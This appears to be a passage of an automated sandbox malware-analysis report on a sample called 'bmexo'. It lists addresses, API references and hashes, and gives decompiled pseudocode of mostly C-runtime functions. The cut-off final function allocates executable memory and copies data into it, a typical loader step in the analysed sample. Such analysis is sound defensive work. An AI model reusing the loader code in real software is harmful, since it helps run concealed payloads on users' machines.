                                          0x00a02291
                                          0x00a02293
                                          0x00a02295
                                          0x00a0229a
                                          0x00a022a1
                                          0x00a022a3
                                          0x00a022a7
                                          0x00a022a9
                                          0x00000000
                                          0x00000000
                                          0x00a022ab
                                          0x00a022ad
                                          0x00a022af
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00a022af
                                          0x00a022b1
                                          0x00a022b4
                                          0x00a022b4
                                          0x00a022b6
                                          0x009c53be
                                          0x009c53be
                                          0x009c53be
                                          0x009c53c0
                                          0x00000000
                                          0x00000000
                                          0x009c53cb
                                          0x009c53ce
                                          0x009c53d0
                                          0x009c53d4
                                          0x009c53d6
                                          0x00000000
                                          0x009c53d8
                                          0x009c53e3
                                          0x009c53ea
                                          0x009c53ea
                                          0x00000000
                                          0x009c53d6
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00a022b6
                                          0x00000000
                                          0x00a0228f
                                          0x00a02349
                                          0x00a0234d
                                          0x00a02251
                                          0x00a02251
                                          0x00000000
                                          0x00a02251
                                          0x00a021a4
                                          0x00a021a4
                                          0x00a021a6
                                          0x00a021a8
                                          0x00a021ac
                                          0x00a021b6
                                          0x00a021b8
                                          0x00a021bc
                                          0x00a021be
                                          0x00000000
                                          0x00000000
                                          0x00a021c0
                                          0x00a021c2
                                          0x00a021c4
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00a021c4
                                          0x00a021c6
                                          0x00a021c6
                                          0x00a021c8
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00a021c8
                                          0x00a021a2
                                          0x00000000
                                          0x00a02183
                                          0x009e057b
                                          0x009e057d
                                          0x009e0581
                                          0x009e0583
                                          0x00a02178
                                          0x00000000
                                          0x009e0589
                                          0x009e058f
                                          0x009e058f
                                          0x009e0583
                                          0x00000000

                                          APIs
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A02206
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050432541.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                          • Associated: 00000006.00000002.1050424338.0000000000980000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051422283.0000000000A70000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051432304.0000000000A80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051440727.0000000000A84000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051450489.0000000000A87000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051476372.0000000000A90000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051559684.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_980000_bmexo.jbxd
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                          • API String ID: 885266447-4236105082
                                          • Opcode ID: bc38fb5914e74c79d1dfdf0f984b291bd1b54c3975016ce8590b4485f4009013
                                          • Instruction ID: 88e760adb3d167d1eb9cb6a70a169e6b7d90ee16fd2d6810c8b08560d104e3e7
                                          • Opcode Fuzzy Hash: bc38fb5914e74c79d1dfdf0f984b291bd1b54c3975016ce8590b4485f4009013
                                          • Instruction Fuzzy Hash: 57515A31B003456FEB15CB19EC86FA673A9AFD8720F218229FD45DB2C5DA75EC818790
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F23815 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 91%
                                          			E00F23815(void* __ebx, void* __edi, void* __eflags) {
				void* __esi;
				void* _t3;
				intOrPtr _t6;
				long _t14;
				long* _t27;

				E00F21890(_t3);
				if(E00F24560() != 0) {
					_t6 = E00F24001(E00F235A6);
					 *0xf3350c = _t6;
					__eflags = _t6 - 0xffffffff;
					if(_t6 == 0xffffffff) {
						goto L1;
					} else {
						_t27 = E00F24869(1, 0x3bc);
						__eflags = _t27;
						if(_t27 == 0) {
							L6:
							E00F2388B();
							__eflags = 0;
							return 0;
						} else {
							__eflags = E00F2405D( *0xf3350c, _t27);
							if(__eflags == 0) {
								goto L6;
							} else {
								_push(0);
								_push(_t27);
								E00F23762(__ebx, __edi, _t27, __eflags);
								_t14 = GetCurrentThreadId();
								_t27[1] = _t27[1] | 0xffffffff;
								 *_t27 = _t14;
								__eflags = 1;
								return 1;
							}
						}
					}
				} else {
					L1:
					E00F2388B();
					return 0;
				}
			}








                                          0x00f23815
                                          0x00f23821
                                          0x00f23830
                                          0x00f23835
                                          0x00f2383b
                                          0x00f2383e
                                          0x00000000
                                          0x00f23840
                                          0x00f2384d
                                          0x00f23851
                                          0x00f23853
                                          0x00f23882
                                          0x00f23882
                                          0x00f23887
                                          0x00f2388a
                                          0x00f23855
                                          0x00f23863
                                          0x00f23865
                                          0x00000000
                                          0x00f23867
                                          0x00f23867
                                          0x00f23869
                                          0x00f2386a
                                          0x00f23871
                                          0x00f23877
                                          0x00f2387b
                                          0x00f2387f
                                          0x00f23881
                                          0x00f23881
                                          0x00f23865
                                          0x00f23853
                                          0x00f23823
                                          0x00f23823
                                          0x00f23823
                                          0x00f2382a
                                          0x00f2382a

                                          APIs
                                          • __init_pointers.LIBCMT ref: 00F23815
                                            • Part of subcall function 00F21890: EncodePointer.KERNEL32(00000000,?,00F2381A,00F2163A,00F32190,00000014), ref: 00F21893
                                            • Part of subcall function 00F21890: __initp_misc_winsig.LIBCMT ref: 00F218AE
                                            • Part of subcall function 00F21890: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00F24117
                                            • Part of subcall function 00F21890: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00F2412B
                                            • Part of subcall function 00F21890: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00F2413E
                                            • Part of subcall function 00F21890: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00F24151
                                            • Part of subcall function 00F21890: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00F24164
                                            • Part of subcall function 00F21890: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00F24177
                                            • Part of subcall function 00F21890: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00F2418A
                                            • Part of subcall function 00F21890: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00F2419D
                                            • Part of subcall function 00F21890: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00F241B0
                                            • Part of subcall function 00F21890: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00F241C3
                                            • Part of subcall function 00F21890: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00F241D6
                                            • Part of subcall function 00F21890: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00F241E9
                                            • Part of subcall function 00F21890: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00F241FC
                                            • Part of subcall function 00F21890: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00F2420F
                                            • Part of subcall function 00F21890: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00F24222
                                            • Part of subcall function 00F21890: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00F24235
                                          • __mtinitlocks.LIBCMT ref: 00F2381A
                                          • __mtterm.LIBCMT ref: 00F23823
                                            • Part of subcall function 00F2388B: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00F23828,00F2163A,00F32190,00000014), ref: 00F2447A
                                            • Part of subcall function 00F2388B: _free.LIBCMT ref: 00F24481
                                            • Part of subcall function 00F2388B: DeleteCriticalSection.KERNEL32(00F33558,?,?,00F23828,00F2163A,00F32190,00000014), ref: 00F244A3
                                          • __calloc_crt.LIBCMT ref: 00F23848
                                          • __initptd.LIBCMT ref: 00F2386A
                                          • GetCurrentThreadId.KERNEL32(00F2163A,00F32190,00000014), ref: 00F23871
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1052302354.0000000000F21000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F20000, based on PE: true
                                          • Associated: 00000006.00000002.1052293820.0000000000F20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000006.00000002.1052319704.0000000000F2E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000006.00000002.1052334096.0000000000F33000.00000008.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000006.00000002.1052343640.0000000000F37000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_f20000_bmexo.jbxd
                                          Similarity
                                          • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                          • String ID:
                                          • API String ID: 3567560977-0
                                          • Opcode ID: c974555283fb68ef14784e2c1a665f9af31bcb36b4191b2d3d5107b25cccfef2
                                          • Instruction ID: 53679f9e9f826de9714607a961869154b42b86f33cd884e755be5cba76d35680
                                          • Opcode Fuzzy Hash: c974555283fb68ef14784e2c1a665f9af31bcb36b4191b2d3d5107b25cccfef2
                                          • Instruction Fuzzy Hash: 07F090B391923659E679B7787C036CA3A84CF01730B24862EF464DC0D2FF5DDA817A91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 009E14C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 64%
                                          			E009E14C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0xa82088; // 0x7502537d
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E009D7707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E009E13CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = E009D7707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = E009D7707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E009A2340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E009AE1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}




















                                          0x009e14c0
                                          0x009e14cb
                                          0x009e14d2
                                          0x009e14d6
                                          0x009e14da
                                          0x009e14de
                                          0x009e14e3
                                          0x009e157a
                                          0x009e157a
                                          0x009e14f1
                                          0x009e14f3
                                          0x00a0ea0f
                                          0x00000000
                                          0x00a0ea15
                                          0x00000000
                                          0x00a0ea15
                                          0x009e14f9
                                          0x009e14f9
                                          0x009e14fe
                                          0x009e1504
                                          0x00a0ea1a
                                          0x00a0ea1f
                                          0x00a0ea21
                                          0x00a0ea22
                                          0x00a0ea27
                                          0x00a0ea2a
                                          0x00a0ea2a
                                          0x009e1515
                                          0x009e1517
                                          0x009e156d
                                          0x009e1572
                                          0x009e1575
                                          0x009e1575
                                          0x009e151e
                                          0x00a0ea50
                                          0x00a0ea55
                                          0x00a0ea58
                                          0x00a0ea58
                                          0x009e152e
                                          0x009e1531
                                          0x009e1533
                                          0x00000000
                                          0x009e1535
                                          0x009e1541
                                          0x009e1549
                                          0x009e1549
                                          0x009e1533
                                          0x009e14f3
                                          0x009e1559

                                          APIs
                                          • ___swprintf_l.LIBCMT ref: 00A0EA22
                                            • Part of subcall function 009E13CB: ___swprintf_l.LIBCMT ref: 009E146B
                                            • Part of subcall function 009E13CB: ___swprintf_l.LIBCMT ref: 009E1490
                                          • ___swprintf_l.LIBCMT ref: 009E156D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050432541.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                          • Associated: 00000006.00000002.1050424338.0000000000980000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051422283.0000000000A70000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051432304.0000000000A80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051440727.0000000000A84000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051450489.0000000000A87000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051476372.0000000000A90000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000006.00000002.1051559684.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_980000_bmexo.jbxd
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: %%%u$]:%u
                                          • API String ID: 48624451-3050659472
                                          • Opcode ID: 764cc12ff7de594366b0e85334a4fa3061122fdd83c4e68ac94151a1e99a0d17
                                          • Instruction ID: 42abb00c8ef8def626569bf9fd9528c615c7f7ebb078b938641f2cd9f0138c0f
                                          • Opcode Fuzzy Hash: 764cc12ff7de594366b0e85334a4fa3061122fdd83c4e68ac94151a1e99a0d17
                                          • Instruction Fuzzy Hash: 6121C3729002199BCF21DF59CC41AEA73BCBB94700F444452FC46D3280EF749E588BE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F212BC Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                                          Download Yara Rule
                                          C-Code - Quality: 69%
                                          			E00F212BC(char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
				char* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __esi;
				signed int _t74;
				signed int _t78;
				char _t81;
				signed int _t86;
				signed int _t88;
				signed int _t91;
				signed int _t94;
				signed int _t97;
				signed int _t98;
				char* _t99;
				signed int _t100;
				signed int _t102;
				signed int _t103;
				signed int _t104;
				char* _t110;
				signed int _t113;
				signed int _t117;
				signed int _t119;
				void* _t120;

				_t99 = _a4;
				_t74 = _a8;
				_v8 = _t99;
				_v12 = _t74;
				if(_a12 == 0) {
					L5:
					return 0;
				}
				_t97 = _a16;
				if(_t97 == 0) {
					goto L5;
				}
				if(_t99 != 0) {
					_t119 = _a20;
					__eflags = _t119;
					if(_t119 == 0) {
						L9:
						__eflags = _a8 - 0xffffffff;
						if(_a8 != 0xffffffff) {
							_t74 = E00F21530(_t99, 0, _a8);
							_t120 = _t120 + 0xc;
						}
						__eflags = _t119;
						if(_t119 == 0) {
							goto L3;
						} else {
							_t78 = _t74 | 0xffffffff;
							__eflags = _t97 - _t78 / _a12;
							if(_t97 > _t78 / _a12) {
								goto L3;
							}
							L13:
							_t117 = _a12 * _t97;
							__eflags =  *(_t119 + 0xc) & 0x0000010c;
							_t98 = _t117;
							if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
								_t100 = 0x1000;
							} else {
								_t100 =  *(_t119 + 0x18);
							}
							_v16 = _t100;
							__eflags = _t117;
							if(_t117 == 0) {
								L41:
								return _a16;
							} else {
								do {
									__eflags =  *(_t119 + 0xc) & 0x0000010c;
									if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
										L24:
										__eflags = _t98 - _t100;
										if(_t98 < _t100) {
											_t81 = E00F22752(_t98, _t119, _t119);
											__eflags = _t81 - 0xffffffff;
											if(_t81 == 0xffffffff) {
												L46:
												return (_t117 - _t98) / _a12;
											}
											_t102 = _v12;
											__eflags = _t102;
											if(_t102 == 0) {
												L42:
												__eflags = _a8 - 0xffffffff;
												if(_a8 != 0xffffffff) {
													E00F21530(_a4, 0, _a8);
												}
												 *((intOrPtr*)(E00F21CC3())) = 0x22;
												L4:
												E00F21E89();
												goto L5;
											}
											_t110 = _v8;
											 *_t110 = _t81;
											_t98 = _t98 - 1;
											_v8 = _t110 + 1;
											_t103 = _t102 - 1;
											__eflags = _t103;
											_v12 = _t103;
											_t100 =  *(_t119 + 0x18);
											_v16 = _t100;
											goto L40;
										}
										__eflags = _t100;
										if(_t100 == 0) {
											_t86 = 0x7fffffff;
											__eflags = _t98 - 0x7fffffff;
											if(_t98 <= 0x7fffffff) {
												_t86 = _t98;
											}
										} else {
											__eflags = _t98 - 0x7fffffff;
											if(_t98 <= 0x7fffffff) {
												_t44 = _t98 % _t100;
												__eflags = _t44;
												_t113 = _t44;
												_t91 = _t98;
											} else {
												_t113 = 0x7fffffff % _t100;
												_t91 = 0x7fffffff;
											}
											_t86 = _t91 - _t113;
										}
										__eflags = _t86 - _v12;
										if(_t86 > _v12) {
											goto L42;
										} else {
											_push(_t86);
											_push(_v8);
											_push(E00F22873(_t119));
											_t88 = E00F22A2A();
											_t120 = _t120 + 0xc;
											__eflags = _t88;
											if(_t88 == 0) {
												 *(_t119 + 0xc) =  *(_t119 + 0xc) | 0x00000010;
												goto L46;
											}
											__eflags = _t88 - 0xffffffff;
											if(_t88 == 0xffffffff) {
												L45:
												_t64 = _t119 + 0xc;
												 *_t64 =  *(_t119 + 0xc) | 0x00000020;
												__eflags =  *_t64;
												goto L46;
											}
											_t98 = _t98 - _t88;
											__eflags = _t98;
											L36:
											_v8 = _v8 + _t88;
											_v12 = _v12 - _t88;
											_t100 = _v16;
											goto L40;
										}
									}
									_t94 =  *(_t119 + 4);
									_v20 = _t94;
									__eflags = _t94;
									if(__eflags == 0) {
										goto L24;
									}
									if(__eflags < 0) {
										goto L45;
									}
									__eflags = _t98 - _t94;
									if(_t98 < _t94) {
										_t94 = _t98;
										_v20 = _t98;
									}
									_t104 = _v12;
									__eflags = _t94 - _t104;
									if(_t94 > _t104) {
										goto L42;
									} else {
										E00F22897(_v8, _t104,  *_t119, _t94);
										_t88 = _v20;
										_t120 = _t120 + 0x10;
										 *(_t119 + 4) =  *(_t119 + 4) - _t88;
										_t98 = _t98 - _t88;
										 *_t119 =  *_t119 + _t88;
										goto L36;
									}
									L40:
									__eflags = _t98;
								} while (_t98 != 0);
								goto L41;
							}
						}
					}
					_t74 = (_t74 | 0xffffffff) / _a12;
					__eflags = _t97 - _t74;
					if(_t97 <= _t74) {
						goto L13;
					}
					goto L9;
				}
				L3:
				 *((intOrPtr*)(E00F21CC3())) = 0x16;
				goto L4;
			}




























                                          0x00f212c6
                                          0x00f212c9
                                          0x00f212cf
                                          0x00f212d2
                                          0x00f212d5
                                          0x00f212f2
                                          0x00000000
                                          0x00f212f2
                                          0x00f212d7
                                          0x00f212dc
                                          0x00000000
                                          0x00000000
                                          0x00f212e0
                                          0x00f212fb
                                          0x00f212fe
                                          0x00f21300
                                          0x00f2130e
                                          0x00f2130e
                                          0x00f21312
                                          0x00f2131a
                                          0x00f2131f
                                          0x00f2131f
                                          0x00f21322
                                          0x00f21324
                                          0x00000000
                                          0x00f21326
                                          0x00f21326
                                          0x00f2132e
                                          0x00f21330
                                          0x00000000
                                          0x00000000
                                          0x00f21332
                                          0x00f21335
                                          0x00f21338
                                          0x00f2133f
                                          0x00f21341
                                          0x00f21348
                                          0x00f21343
                                          0x00f21343
                                          0x00f21343
                                          0x00f2134d
                                          0x00f21350
                                          0x00f21352
                                          0x00f2143b
                                          0x00000000
                                          0x00f21358
                                          0x00f21358
                                          0x00f21358
                                          0x00f2135f
                                          0x00f213a0
                                          0x00f213a0
                                          0x00f213a2
                                          0x00f2140d
                                          0x00f21413
                                          0x00f21416
                                          0x00f2146d
                                          0x00000000
                                          0x00f21473
                                          0x00f21418
                                          0x00f2141b
                                          0x00f2141d
                                          0x00f21443
                                          0x00f21443
                                          0x00f21447
                                          0x00f21451
                                          0x00f21456
                                          0x00f2145e
                                          0x00f212ed
                                          0x00f212ed
                                          0x00000000
                                          0x00f212ed
                                          0x00f2141f
                                          0x00f21422
                                          0x00f21425
                                          0x00f21426
                                          0x00f21429
                                          0x00f21429
                                          0x00f2142a
                                          0x00f2142d
                                          0x00f21430
                                          0x00000000
                                          0x00f21430
                                          0x00f213a4
                                          0x00f213a6
                                          0x00f213ca
                                          0x00f213cf
                                          0x00f213d5
                                          0x00f213d7
                                          0x00f213d7
                                          0x00f213a8
                                          0x00f213aa
                                          0x00f213b0
                                          0x00f213c2
                                          0x00f213c2
                                          0x00f213c2
                                          0x00f213c4
                                          0x00f213b2
                                          0x00f213b7
                                          0x00f213b9
                                          0x00f213b9
                                          0x00f213c6
                                          0x00f213c6
                                          0x00f213d9
                                          0x00f213dc
                                          0x00000000
                                          0x00f213de
                                          0x00f213de
                                          0x00f213df
                                          0x00f213e9
                                          0x00f213ea
                                          0x00f213ef
                                          0x00f213f2
                                          0x00f213f4
                                          0x00f2147b
                                          0x00000000
                                          0x00f2147b
                                          0x00f213fa
                                          0x00f213fd
                                          0x00f21469
                                          0x00f21469
                                          0x00f21469
                                          0x00f21469
                                          0x00000000
                                          0x00f21469
                                          0x00f213ff
                                          0x00f213ff
                                          0x00f21401
                                          0x00f21401
                                          0x00f21404
                                          0x00f21407
                                          0x00000000
                                          0x00f21407
                                          0x00f213dc
                                          0x00f21361
                                          0x00f21364
                                          0x00f21367
                                          0x00f21369
                                          0x00000000
                                          0x00000000
                                          0x00f2136b
                                          0x00000000
                                          0x00000000
                                          0x00f21371
                                          0x00f21373
                                          0x00f21375
                                          0x00f21377
                                          0x00f21377
                                          0x00f2137a
                                          0x00f2137d
                                          0x00f2137f
                                          0x00000000
                                          0x00f21385
                                          0x00f2138c
                                          0x00f21391
                                          0x00f21394
                                          0x00f21397
                                          0x00f2139a
                                          0x00f2139c
                                          0x00000000
                                          0x00f2139c
                                          0x00f21433
                                          0x00f21433
                                          0x00f21433
                                          0x00000000
                                          0x00f21358
                                          0x00f21352
                                          0x00f21324
                                          0x00f21307
                                          0x00f2130a
                                          0x00f2130c
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00f2130c
                                          0x00f212e2
                                          0x00f212e7
                                          0x00000000

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1052302354.0000000000F21000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F20000, based on PE: true
                                          • Associated: 00000006.00000002.1052293820.0000000000F20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000006.00000002.1052319704.0000000000F2E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000006.00000002.1052334096.0000000000F33000.00000008.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000006.00000002.1052343640.0000000000F37000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_f20000_bmexo.jbxd
                                          Similarity
                                          • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                          • String ID:
                                          • API String ID: 1559183368-0
                                          • Opcode ID: 0bb837822c449fc72efdb440be1ab00ec04426b9921edd9ac7c64893c8882779
                                          • Instruction ID: 1bcf9de745c09619da9bc4635b07aa96935cbff39a7f37e185754ced7966e0f4
                                          • Opcode Fuzzy Hash: 0bb837822c449fc72efdb440be1ab00ec04426b9921edd9ac7c64893c8882779
                                          • Instruction Fuzzy Hash: 6851C631E00325DBDB24DFA9F88066E77A6BF61330F248729F829866D0D7749D50AB49
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F27452 Relevance: 7.6, APIs: 5, Instructions: 67COMMONLIBRARYCODE
                                          Download Yara Rule
                                          C-Code - Quality: 95%
                                          			E00F27452(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
				void* _t7;
				void* _t8;
				intOrPtr* _t9;
				intOrPtr* _t12;
				void* _t20;
				long _t31;

				if(_a4 != 0) {
					_t31 = _a8;
					if(_t31 != 0) {
						_push(__ebx);
						while(_t31 <= 0xffffffe0) {
							if(_t31 == 0) {
								_t31 = _t31 + 1;
							}
							_t7 = HeapReAlloc( *0xf34834, 0, _a4, _t31);
							_t20 = _t7;
							if(_t20 != 0) {
								L17:
								_t8 = _t20;
							} else {
								if( *0xf34830 == _t7) {
									_t9 = E00F21CC3();
									 *_t9 = E00F21CD6(GetLastError());
									goto L17;
								} else {
									if(E00F21741(_t7, _t31) == 0) {
										_t12 = E00F21CC3();
										 *_t12 = E00F21CD6(GetLastError());
										L12:
										_t8 = 0;
									} else {
										continue;
									}
								}
							}
							goto L14;
						}
						E00F21741(_t6, _t31);
						 *((intOrPtr*)(E00F21CC3())) = 0xc;
						goto L12;
					} else {
						E00F24831(_a4);
						_t8 = 0;
					}
					L14:
					return _t8;
				} else {
					return E00F2114B(__ebx, __edx, __edi, _a8);
				}
			}









                                          0x00f27459
                                          0x00f27467
                                          0x00f2746c
                                          0x00f2747b
                                          0x00f274ae
                                          0x00f27480
                                          0x00f27482
                                          0x00f27482
                                          0x00f2748f
                                          0x00f27495
                                          0x00f27499
                                          0x00f274f9
                                          0x00f274f9
                                          0x00f2749b
                                          0x00f274a1
                                          0x00f274e3
                                          0x00f274f7
                                          0x00000000
                                          0x00f274a3
                                          0x00f274ac
                                          0x00f274cb
                                          0x00f274df
                                          0x00f274c5
                                          0x00f274c5
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00f274ac
                                          0x00f274a1
                                          0x00000000
                                          0x00f274c7
                                          0x00f274b4
                                          0x00f274bf
                                          0x00000000
                                          0x00f2746e
                                          0x00f27471
                                          0x00f27477
                                          0x00f27477
                                          0x00f274c8
                                          0x00f274ca
                                          0x00f2745b
                                          0x00f27465
                                          0x00f27465

                                          APIs
                                          • _malloc.LIBCMT ref: 00F2745E
                                            • Part of subcall function 00F2114B: __FF_MSGBANNER.LIBCMT ref: 00F21162
                                            • Part of subcall function 00F2114B: __NMSG_WRITE.LIBCMT ref: 00F21169
                                            • Part of subcall function 00F2114B: HeapAlloc.KERNEL32(00000000,00000000,00000001,00000000,00000000,00000000,?,00F248C7,00000000,00000000,00000000,00000000,?,00F244F9,00000018,00F32280), ref: 00F2118E
                                          • _free.LIBCMT ref: 00F27471
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1052302354.0000000000F21000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F20000, based on PE: true
                                          • Associated: 00000006.00000002.1052293820.0000000000F20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000006.00000002.1052319704.0000000000F2E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000006.00000002.1052334096.0000000000F33000.00000008.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000006.00000002.1052343640.0000000000F37000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_f20000_bmexo.jbxd
                                          Similarity
                                          • API ID: AllocHeap_free_malloc
                                          • String ID:
                                          • API String ID: 2734353464-0
                                          • Opcode ID: 219df23d8c9bc424a7cd698452e6d47b33cfe1fe1780128de9111ab3920a5a8c
                                          • Instruction ID: fb447e93684eef3c71140e95eba00b7b1477385d4cae60da360431e1652530e0
                                          • Opcode Fuzzy Hash: 219df23d8c9bc424a7cd698452e6d47b33cfe1fe1780128de9111ab3920a5a8c
                                          • Instruction Fuzzy Hash: EE110A32D4A735DBCB31BF70BC45B5A3FD8BF10370B204529F9489A250DA788841F694
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F21000 Relevance: 7.6, APIs: 5, Instructions: 56memoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 92%
                                          			E00F21000(void* __ecx, void* __eflags, intOrPtr _a12) {
				intOrPtr _v8;
				void* __ebx;
				void* __edi;
				intOrPtr _t6;
				void* _t7;
				void* _t20;
				_Unknown_base(*)()* _t21;
				void* _t26;
				void* _t27;
				void* _t28;
				intOrPtr* _t34;

				_push(_t20);
				_t28 = 0;
				_t6 = E00F2114B(_t20, _t26, 0, 0x17d78400);
				 *_t34 = 0xf33000;
				_v8 = _t6;
				_t7 = E00F211DD(_a12, _t27);
				_t21 = VirtualAlloc(0, 0x12ca, 0x3000, 0x40);
				E00F21481(_t21, 0x12ca, 1, _t7);
				_t10 = _v8;
				if(_v8 != 0) {
					E00F21530(_t10, 0xcb, 0x17d78400);
					do {
